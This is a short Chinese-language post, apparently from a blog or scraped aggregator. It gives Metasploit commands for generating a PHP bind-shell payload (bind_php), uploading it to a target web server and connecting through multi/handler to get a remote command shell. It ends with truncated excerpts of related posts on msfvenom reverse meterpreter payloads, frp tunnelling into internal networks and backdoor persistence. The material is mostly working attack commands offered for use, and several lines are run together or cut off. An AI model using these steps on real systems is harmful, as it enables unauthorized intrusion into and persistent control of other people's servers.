感謝:
perl6大佬分享的姿勢。msf:
msf > use payload/php/bind_php然後將xishaonian.php傳到web上。msf exploit(handler) > set payload payload/php/bind_php
msf exploit(handler) > set rhost 目標內網ip
msf payload(bind_php) > generate -f f:/xishaonian.php -t raw //之後就會在f盤生成xishaonian.php指令碼一般都是需要修改一下,沒有php標籤就加個php標籤之類的。
然後再次執行msf
use payload/php/bind_php訪問web上的xishaonian.php,就可以**到cmdshell了。msf payload(bind_php) > set rhost 目標外網ip
msf payload(bind_php) > use exploit/multi/handler
msf exploit(handler) > set payload php/bind_php
msf exploit(handler) > run
msf反彈shell內網滲透
1.msfvenom p windows x64 meterpreter reverse tcp lhost 本機ip位址 lport 本機監聽埠 f psh reflection o xx.ps1 生成檔案放在目標機目錄下 powershell執行指令碼 powershell windowstyl...
win 內網frp反彈到內網liunx
這是我的兩個版本 我這個就是驗證frp可以在不同系統之間使用 準備工作 靶機 win2003 ip 192.168。1.132 公網 vps windows x.x.x.x kali 192.168。1.104 這裡 為了模擬 win和kali不是乙個網段 所以不直接 shell 假裝兩台pc不能p...
內網滲透 許可權維持 MSF
msf路徑 usr share 製作後門 msfvenom windows示例 遠控流程 2.開啟msf並進入handle模組 3.設定payload型別 必須與第一步一致 4.設定lhost和lport 與第一步生成的後門一致 5.options檢視配置是否正確 6.run執行 bg將程序放到後台...